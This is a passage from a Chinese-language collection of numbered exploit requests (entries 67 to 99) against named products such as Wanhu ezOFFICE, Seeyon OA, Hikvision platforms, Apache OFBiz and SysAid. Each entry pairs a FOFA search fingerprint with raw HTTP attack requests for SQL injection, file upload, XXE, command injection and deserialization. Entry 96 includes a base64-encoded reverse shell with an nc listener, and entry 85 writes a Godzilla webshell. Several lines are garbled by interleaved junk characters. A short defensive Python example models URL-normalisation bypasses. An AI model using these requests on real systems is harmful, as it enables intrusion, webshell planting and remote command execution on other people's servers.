GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9 (the MD5 of 102103122 computed by the injected SELECT), the target is vulnerable.

67. Wanhu ezOFFICE (万户ezOFFICE) wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
newdocId and filename set the name of the written file, dir sets the directory it is written to, and fileType sets its extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is then served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu ezOFFICE (万户ezOFFICE) wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The ;.js suffix is a path-parameter trick: an authentication filter that allow-lists static suffixes sees .js, while the servlet container strips the ;-parameter and still dispatches to the JSP. A delay of roughly five seconds in the response indicates the injection.

69. Wanhu ezOFFICE (万户ezOFFICE) contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu ezEIP (万户ezEIP) success.aspx command execution
FOFA: app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

The SID header is base64 of the command type C:\Windows\win.ini; the __VIEWSTATE value, elided here as PAYLOAD, is the ViewState deserialization payload.

71. Bangyong PM2 project management system (邦永PM2项目管理系统) Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

' Z  D2 ^" G* y72. 致远OA getAjaxDataServlet XXE
6 L8 F! h: t# d0 o- z) Y; tFOFA:app="致远互联-OA"
7 l  ~$ K4 y9 b; e# K5 G9 A" Z2 U, pPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
) D/ o- \- ?+ X$ nHost: 192.168.40.131:8099  U/ y2 r$ Y4 J8 B
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
. C+ A0 P- [5 M8 r. z. L% LConnection: close
1 y1 f: T$ [/ c, X* ~8 F. R- p! EContent-Length: 583
& X5 o! f! K( ~Content-Type: application/x-www-form-urlencoded5 A, I) r9 k' a$ ~7 W' X: x7 ~
Accept-Encoding: gzip
6 ?' b) ]6 @- O7 d% w5 w$ n  p- r; ~: J
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
/ X) r' u- A! ]6 X' Q
. }3 Y) u% o! b' ]$ E
73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon M3-Server (致远M3-server) 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then fetch the file the backtick-substituted command wrote:

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec campus service management platform (新开普掌上校园服务管理平台) service.action remote command execution
FOFA: title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

UnitCode is rendered as a FreeMarker template, so the ?new() built-in instantiates freemarker.template.utility.Execute and runs the command. Then fetch the file it wrote:

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 clothing management software (F22服装管理软件系统) UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system (建设工程质量监督系统) FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

Then fetch the uploaded file:

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) intelligent flow-control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. Superdata Tianyao (速达天耀) DesignReportSave.jsp arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

Then fetch the uploaded file:

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password disclosure
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

The Cmd header carries the command to run; the JSON body is elided here as PAYLOAD.

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami`\")}",
  "type": "0"
}

The sql field is evaluated as a FreeMarker template before it is executed, the same ?new() chain as entry 76; a DNS callback to the dnslog host confirms execution.

85. SysAid On-Premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The exploit request below writes a Godzilla (哥斯拉) webshell:
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

The shell is then reachable at http://x.x.x.x/userfiles/index.jsp

86. TOSEI (Japan) self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

The host value injects a newline (%0a) into the ping command line, and ${IFS} stands in for the space so the command survives without a literal space character.

87. DBAppSecurity MingYu security gateway (安恒明御安全网关) aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

The traversal in suffix places the uploaded content at /jfhatuwe.php, which is then requested directly.

88. DBAppSecurity MingYu security gateway (安恒明御安全网关) aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

The type value decodes to a newline-injected shell command: echo '<?php echo "assdwdmpidmsbzoabahpjhnokiduw"; phpinfo(); ?>' >> /usr/local/webui/txzfsrur.php. The written file is then reachable at /txzfsrur.php

89. Seeyon FE collaborative office platform (致远互联FE协作办公平台) editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

editflow_manager.js%70 is editflow_manager.jsp with the p percent-encoded, which slips past a filter that matches on the literal .jsp suffix. The value 24642 (111*222) in the response confirms the injection.

90. Hikvision IP network intercom broadcast system (海康威视IP网络对讲广播系统) 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

: q( q# U7 n/ S# g91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取, H9 Z1 h" K6 j. l6 M  _
FOFA:title="综合安防管理平台"- s. j8 V- V" S% U1 a6 X
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
0 v# M$ J9 P' |+ jHost: your-ip
$ F$ M  }7 ?' \" eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36/ f$ ^1 Z5 b+ B5 O( t
Accept-Encoding: gzip, deflate
8 |9 a& }. ~1 i* i2 J8 X6 i( d. HAccept: */*
* y6 N# o* }$ T/ a9 t# C- O7 |Connection: keep-alive3 k. v9 M! G* ~4 c& ?2 ^

0 Y+ `4 h0 O3 ?) [  }1 X% ^: ]: [
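The URL tricks used in entries 68, 89 and 91 (a ;.js path-parameter suffix, a percent-encoded .js%70 extension, and a ..;/ dot segment) all exploit the same gap: an access rule evaluated on the raw request URI, while the servlet container normalises the path before dispatching. Added example, not from the original post or from any vendor's code: a Python model of that normalisation next to a raw-URI rule, plus a safe_join for fileName-style parameters as in entries 63 and 91. The protected-prefix policy, the directory names and the simplified container behaviour are assumptions for the demo.

```python
import posixpath
from urllib.parse import unquote

# Request paths from entries 68, 89 and 91 above.
PATHS = {
    "68": "/defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js",
    "89": "/sysform/003/editflow_manager.js%70",
    "91": "/center/api/task/..;/orgManage/v1/orgs/download",
}

# Demo policy (an assumption, not any vendor's configuration): JSP pages and
# the orgManage API require an authenticated session; everything else is public.
PROTECTED_SUFFIXES = (".jsp",)
PROTECTED_PREFIXES = ("/center/api/orgManage/",)

def canonicalize(path):
    """Approximate the servlet container's view of a request URI: percent-decode,
    drop the ';param' part of every segment, then resolve '.' and '..'.
    This models the Tomcat-style handling the three requests rely on; real
    containers add more rules (double decoding, backslashes, case folding),
    so treat this as the minimum, not the whole story."""
    segments = []
    for seg in unquote(path).split("/"):
        seg = seg.split(";", 1)[0]
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    return "/" + "/".join(segments)

def needs_session(path):
    """The access rule, applied literally to whatever string it is handed."""
    return path.endswith(PROTECTED_SUFFIXES) or path.startswith(PROTECTED_PREFIXES)

def decide(path):
    """Evaluate the rule on the raw URI (how a front-end filter often does it)
    and on the canonical path (what the container will actually serve)."""
    canon = canonicalize(path)
    return {"canonical": canon,
            "raw_rule_protects": needs_session(path),
            "canonical_rule_protects": needs_session(canon)}

def safe_join(base_dir, user_path):
    """For download parameters such as fileName=../../etc/passwd (entries 63
    and 91): resolve the name under base_dir and refuse anything that escapes."""
    base = posixpath.normpath(base_dir)
    target = posixpath.normpath(posixpath.join(base, user_path.lstrip("/")))
    if target != base and not target.startswith(base + "/"):
        raise ValueError(f"path escapes {base}: {user_path!r}")
    return target

if __name__ == "__main__":
    for entry, path in PATHS.items():
        print(entry, decide(path))
    print(safe_join("/var/app/export", "report.xlsx"))
```

Run it and all three paths come back raw_rule_protects=False, canonical_rule_protects=True, which is exactly the gap the three requests use. The durable fix is to make the authorization decision after the container has resolved the path (a servlet filter mapped to the protected resources, or the framework's own security layer) and to reject request URIs containing ; or .. outright at the edge rather than trying to second-guess normalisation.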

92. Hikvision operations management center (海康威视运行管理中心) session command execution
Fastjson-based command execution
Hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host: 
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. Qi An Xin Legendsec SecGate 3600 firewall (奇安信网神SecGate3600防火墙) app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

Then fetch the uploaded file:

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qianxin Legendsec SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
